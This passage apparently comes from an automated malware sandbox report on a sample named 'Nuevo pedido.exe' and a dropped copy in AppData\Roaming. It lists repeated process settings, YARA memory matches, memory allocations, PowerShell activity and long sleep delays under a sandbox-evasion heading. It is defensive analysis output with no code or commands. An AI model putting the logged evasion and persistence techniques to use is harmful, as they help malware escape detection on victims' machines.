                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeProcess information set: NOOPENFILEERRORBOX

                  Malware Analysis System Evasion

                  barindex
                  Source: Yara matchFile source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: E50000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: 28B0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: 8880000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: 9880000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: 9A80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: AA80000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: B030000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: 8880000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: 3100000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeMemory allocated: 5100000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: 2EC0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: 30D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: 50D0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: 8BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: 9BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: 9DE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: ADE0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: B490000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: 8BF0000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: 3050000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: 3240000 memory reserve | memory write watch
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeMemory allocated: 5240000 memory reserve | memory write watch
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599657Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599532Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599407Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599282Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599157Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 599032Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598922Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598688Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598438Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598313Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598203Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 598094Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597969Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597860Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597735Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597610Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597485Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597360Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597219Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597109Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 597000Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596891Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596766Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596641Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596532Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596407Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596282Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596172Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 596063Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595688Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595344Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595219Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 922337203685477
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 600000
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599891
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599782
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599657
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599532
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599407
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599282
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599157
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 599047
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598938
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598813
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598688
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598563
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598438
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598328
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598219
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 598094
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597985
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597860
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597735
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597610
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597485
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597360
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597235
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 597110
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596985
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596860
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596735
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596610
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596485
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 596360
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595732
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595625
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595516
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595406
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595297
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595188
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 595063
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594953
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594842
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594734
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594625
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594516
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594391
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594282
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594157
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 594028
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 593922
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 593801
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeThread delayed: delay time: 593667
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7181Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 456Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7026Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 739Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeWindow / User API: threadDelayed 2694Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeWindow / User API: threadDelayed 7124Jump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exeWindow / User API: foregroundWindowGot 1769Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeWindow / User API: threadDelayed 1785
                  Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exeWindow / User API: threadDelayed 8049
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 7308Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640Thread sleep count: 7181 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620Thread sleep count: 456 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828Thread sleep time: -8301034833169293s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740Thread sleep time: -922337203685477s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -599875s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -599766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -599657s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -599532s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -599407s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -599282s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -599157s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -599032s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -598922s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -598813s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -598688s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -598563s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -598438s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -598313s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -598203s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -598094s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -597969s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -597860s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -597735s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -597610s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -597485s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -597360s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -597219s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -597109s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -597000s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -596891s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -596766s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -596641s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020Thread sleep time: -596532s >= -30000sJump to behavior
